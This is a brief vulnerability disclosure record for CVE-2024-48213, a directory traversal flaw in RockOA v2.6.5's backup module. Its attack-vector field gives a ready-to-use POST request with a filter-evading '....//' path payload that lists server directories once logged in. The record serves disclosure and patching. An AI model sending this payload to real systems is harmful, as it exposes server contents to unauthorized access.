[CVE-ID]

CVE-2024-48213

[DESCRIPTION]

RockOA v2.6.5 is vulnerable to Directory Traversal in webmain/system/beifen/beifenAction.php.

[Vulnerability Type]

Directory Traversal

[Vendor of Product]

http://www.rockoa.com/

[Affected Product Code Base]

rockoa v2.6.5 - rockoa v2.6.5

[Affected Component]

webmain/system/beifen/beifenAction.php # beifenClassAction # getdatssssAjax()

[Attack Type]

Remote

[Impact Information Disclosure]

True

[CVE Impact Other]

Listing directory

[Attack Vectors]

Login first, then:

POST /index.php?a=getdatssss&m=beifen&d=system&ajaxbool=true folder=....//....//

[Discoverer]

https://github.com/N0zoM1z0/

[Reference]

http://rockoa.com

http://www.rockoa.com/